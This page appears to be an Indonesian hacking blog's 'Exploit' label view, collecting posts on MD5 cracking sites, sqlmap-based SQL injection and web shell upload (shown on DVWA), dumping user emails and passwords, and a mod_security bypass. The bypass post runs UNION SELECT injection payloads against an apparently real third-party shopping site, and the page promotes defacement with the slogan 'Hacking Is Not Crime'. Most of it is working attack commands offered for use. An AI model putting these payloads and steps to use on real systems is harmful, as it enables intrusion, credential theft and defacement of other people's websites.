Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts

MD5 Hash Cracker Online

Inilah Link hash cracker Online yang saya lihat2 juga bagus untuk digunakan untuk menghash Password yang terenkripsi

http://www.md5rainbow.com/
291,121,047,891 hash

http://www.tobtu.com/md5.php
50,529,455,839 hash

http://www.md5decrypter.co.uk/
43,745,000,000 hash

http://www.tmto.org/pages/passwordtools/hashcracker/
36,436,233,567 hash

http://www.onlinehashcrack.com/
5,211,644,250 hash

http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
4,700,000,000 hash

http://www.hash-cracker.com/index.php
700.000.000 hash

http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php
500,000,000 hash

http://www.md5this.com/index.php
400,000,000 hash

http://www.netmd5crack.com/cracker/
171,392,210 hash

http://md5.rednoize.com/
161,613,788 hash

http://md5decryption.com/
105,300,000 hash

http://md5.gromweb.com/
90,818,581 hash

http://isc.sans.edu/tools/reversehash.html
20,273,681 hash

http://www.md5decrypter.com/
8,103,123 hash

https://hashcracking.ru/index.php
3,585,150 hash

http://md5.shalla.de/cgi-bin/search.cgi
2,218,319 hash

http://www.hash-database.net/
1,914,458 hash

http://md5pass.info/
695,751 hash

Sumber : Cek

Cara Hack Website dengan Metode Upload Shell menggunakan Sqlmap

Cara Hack Website dengan Metode Upload Shell menggunakan Sqlmap

 

Cara Hack Website dengan Metode Upload Shell menggunakan Sqlmap

Halo sobat dytrac0ders, kemarin Saya sudah mengajarkan sobat Cara Meretas Website dengan menggunakan Sqlmap . Kita bisa login dengan username & password yang kita dapatkan ke website korban melalui username & password yang kita panen lewat sqlmap.

Namun terkadang ada kasus dimana kita tidak bisa login menggunakan username dan password yang kita dapatkan. Dan kalaupun kita berhasil login dengan username & password tersebut, kita kesulitan untuk mencari form upload, bahkan mungkin memang tidak ada form uploadnya untuk mengupload shell.

Nah untuk tutorial ini Saya akan mengajarkan sobat cara mengupload shell hanya dengan menggunakan sqlmap. Ya, hanya dengan menggunakan sqlmap. Tidak percaya? Simak saja tutorial ini sampai selesai

Bagaimana Cara Kerja Metode Ini? 

  • Dalam Sistem Database, ada user yang harus terdaftar pada Sistem Database untuk dapat mengakses database. Masing-masing user memiliki hak akses yang berbeda. 
  • Ada yang hanya bisa membaca data pada database, juga ada yang bisa memanipulasi isi database. Nah, sobat tahu siapa yang memiliki hak untuk memberikan hak akses kepada user-user tersebut? Dialah si admin atau biasa disebut DBA (Database Administrator). 
  • DBA merupakan user yang istilahnya lebih tinggi daripada user-user lainnya. DBA tidak hanya dapat memberikan hak akses serta memanipulasi isi data pada database, namun DBA juga memiliki kemampuan dalam manajemen file. 
  • Kemampuan manajemen file tersebut maksudnya si DBA dapat membuat file hanya dengan menggunakan perintah SQL! File seperti apa yang dapat dibuat oleh DBA? Apa saja bisa sobat, termasuk membuat file php untuk mengupload shell yang akan kita bahas di tutorial kali ini
  • Perlu dicatat bahwa celah ini kebanyakan sudah jarang ditemukan. Namun tidak menutup kemungkinan sobat bisa menemukan celah ini pada suatu website. 

Syarat menggunakan Metode ini agar Sukses

  • Memiliki celah SQL Injection
  • User merupakan DBA
  • Mengetahui direktori web server (Penjelasan ada dibawah bagian Tutorial)

Sebelum sobat membaca tutorial ini, pastikan sobat sudah membaca dan memahami materi dibawah ini karena materi tersebut sangat berhubungan dengan tutorial ini

Alat yang harus disiapkan

 

Tutorial

Seperti biasa, Saya tidak akan menggunakan website asli di internet untuk melakukan aksi peretasan ini. Saya menggunakan aplikasi web yang bernama DVWA. Jika sobat ingin mengetahui lebih lanjut tentang apa itu DVWA serta cara instalasinya, Saya sudah membuat tutorialnya disini.

  • Aktifkan web server sobat
  • Buka browser sobat, lalu akses http://localhost/dvwa
  • Login menggunakan username admin, serta passwordnya password
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Pilih menu DVWA Security, kemudian atur tingkat kesulitannya menjadi Low. Lalu klik Submit
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Pilih menu SQL Injection, kemudian isi 1 pada textbox User ID
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Oke, Saya tidak akan menjelaskan bagaimana cara mendeteksi bug SQL pada suatu website, karena sudah dijelaskan pada tutorial sebelumnya
  • Copy URL pada browser
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Buka terminal atau command prompt sobat (pastikan masuk sebagai root atau administrator)
  • Mari kita mulai bersqlmap! Mari kita cek apakah user merupakan DBA, dengan menambahkan parameter --is-dba seperti dibawah ni
  • sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --is-dba
  • Pada gambar dibawah ini kita mendapatkan error 302 redirect, itu karena kita lupa menambahkan parameter --cookie.
    • Perlu diingat bahwa menambahkan parameter --cookie itu tidak wajib ditambahkan jika sobat ingin mencobanya pada website asli di internet
  • Mari kita tambahkan parameter cookie dengan menekan tombol SHIFT+CTRL+K pada browser
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Ketik perintah document.cookie untuk menampilkan cookie, lalu tekan ENTER
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Copy cookie tersebut,lalu tambahkan ke syntax sqlmap kita
  • sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; _js_datr=zJXkV8JFK0z5lp9-ZkUV2pk4; PHPSESSID=nrag18uim5ae8frgch6vap2j77" --is-dba
  • Jalankan perintah diatas
  • Perhatikan pada teks bagian current user is DBA. Jika nilainya False, website tersebut tidak vuln menggunakan metode ini, namun jika nilainya True,website tersebut vuln. Dan pada gambar dibawah nilainya True! Kita bisa melanjutkan serangan kita!
  • Nah, tahap ini baru tahap yang seru
  • Pada tahap dibawah ini kita akan membuat file php uploader untuk mengupload shell kita menggunakan sqlmap
  • Saya menggunakan shell karya anak bangsa yaitu IndoXploit Shell yang dibuat oleh team IndXploit sendiri. Shell IndoXploit bisa didownload di tombol dibawah ini
    http://adf.ly/1gTxAp
  • Oke mari kita racik perintah sqlmap kita
  • Hapus parameter --is-dba , kemudian tambahkan perintah --os-shell. Dengan parameter --os-shell, sqlmap akan membuat halaman upload untuk mengupload shell kita
  • sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; _js_datr=zJXkV8JFK0z5lp9-ZkUV2pk4; PHPSESSID=nrag18uim5ae8frgch6vap2j77" --os-shell
  • Jalankan perintah diatas (sesuaikan dengan cookie sobat)
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Kita diminta untuk memilih bahasa pemograman yang didukung oleh web server kita. Karena DVWA menggunakan bahasa PHP ketik 4 atau langsung saja tekan ENTER
  • Pada gambar dibawah , ada beberapa pilihan menu untuk menginputkan direktori writeable. Direktori writeable merupakan direktori/folder yang dapat diisi dengan file. Ini bagian yang susah, selain user harus DBA, kita juga harus mengetahui direktori writeable tersebut. Untuk cara mencari direktori writeable akan dijelaskan dibawah.
    • [1] Mencari direktori umum
    • [2] Menggunakan direktori sesuai keinginan kita
    • [3] Menggunakan daftar direktori sesuai keinginan ita
    • [4] Mencari direktori menggunakan metode brute force (memakan waktu yang lamma)
  • Kita mengetahui bahwa direktori dimana DVWA disimpan yaitudi /var/www/html/dva, untuk sobat pengguna Windows direktori DVWA yaitu di C:\XAMPP\htdocs\dvwa
  • Maka dari itu kita pilih menu [2], kemudian masukkan direktori dimana DVWA tersimpan. Lalu tekan ENTER
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Dan berhasil! kita berhasil mendapatkan shell!
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Sobat bisa mengeksekusi perintah linux disini, misalkan perintah ls untuk melihat isi file & folder
    • os-shell> ls
  • Perintah ls bekerja dengan baik!
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Nah sobat pasti pada penasaraan kan bagaimana cara mengupload shell
  • Lihat pada teks bagian yang saya highlight pada gambar dibawah ini
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Disitulah file uploadernya berada yaitu di http://localhost/dvwa/vulnerabilities/sqli/tmpuliaa.php
  • Copy link tersebut kemudian Mari kita akses pada browser kita
  • Dan voila! Berikut penampakan file uploadernya
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Gausa lama-lama lagi sobat, langsung saja kita upload shell IndoXploitnya!
  • Nama file shell IndoXploit saya namakan indoxploit.php. Jadi kita bisa mengakses shell tersebut di http://localhost/dvwa/vulnerabilities/sqli/indoxploit.php
  • Dan boomm! Kita mendapatkan akses ke shell kita!
    Cara hack website dengan metode upload shell menggunakan sqlmap
  • Untuk shell IndoXploit masukan passwordnya yaitu IndoXploit. Lalul tekan ENTER
  • Dan boom boom boom! Sekarang terserah kita mau ngapain website ini!
    Cara hack website dengan metode upload shell menggunakan sqlmap

Bagaimana cara Mengetahui Writeable Directory pada suatu Website?

Ini merupakan bagian yang sulit, karena walaupun user dalam DBMS merupakan DBA, jika kita tidak mengetahui path/directory pada website tersebut, kita tidak akan berhasil mendapatkan akses melalui metode ini. Maka dari itu untuk mencari celah ini sangat sulit dan jarang ditemukan.
Namun Saya akan mencoba menjawabnya berdasarkan pengetahuan Saya

Mari kita akses link ang memiliki celah SQLi yaitu di http://localhost/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit# 

Sobat bisa melihat errornya yaitu :
  • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1



Nah, Di website luar pada halaman ini,terkadang direktori web tersebut ditampilkan seperti gambar dibawah ini
SQL Injection Using Sqlmap in kali linux

SQL Injection Using Sqlmap in kali linux



SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a  linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5  – -dbs
5
when sqlmap is done, it will tell you the Mysql version and some other information about the database.

At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables

c

The result should be something like this :
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns


f

The result should be like this :
last step we need to get data from columns , so the final command will look like this.
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
 and here’s the final result : we have got the name, mail and password:


z

[Tutorial] Bypass WAF (Mod_Security)

Assalamuallaikum sobat xVm.
Setelah sekian lama engak ngepost masalah deface, nih kita mulai singgung lagi :D




Kali ini saya akan membahas tutorial mengenai Bypass WAF (Mod_Security) nah langsung aja bagi yang ingin belajar langsung ikutin tutorial dibawah :

1. Contoh target
http://www.harshstones.com/product-detail.php?id=35

2. Sekarang kita cari jumlah table databasenya dengan perintah " Order by "
http://www.harshstones.com/product-detail.php?id=35 order by 1-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal 
http://www.harshstones.com/product-detail.php?id=35 order by 13-- Error
Berarti jumlah table databasenya adalah 12

3. Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
Sekarang kita jalankan perintahnya
http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--
 
4. Sekarang kita bypass dengan perintah :
/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
5. Sekarang kita coba dengan site diatas :
http://www.harshstones.com/product-detail.php?id=-35/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12--
 
Nah sekian artikel yang bisa saya sampaikan, tutorial ini ditulis oleh AtzShahab di forum IDCA.
Jika ada kendala silahkan kunjungi link disini
Author : AtzShahab

Admin Finder Script

Hello sobat :D
kali ini saya akan share alat untuk mencari halaman login admin di dalam suatu website :D kan percuma jika tau username dan password si admin, tetapi tidak mengetahui halaman login adminnya :D

Sebelum menggunakan adminfinder.py ?? pastika PC anda sudah terinstall PYTHON ?? jika belom ??
Download disini :
-Download Python

Okkhe sudah kan ?? langsung disedot aja :D
-Download Admin Finder [PYTHON SCRIPT]






Hacking Is Not Crime !!

#CaraMencariHalamanAdmin, #AdminLogin #SearchLoginAdmin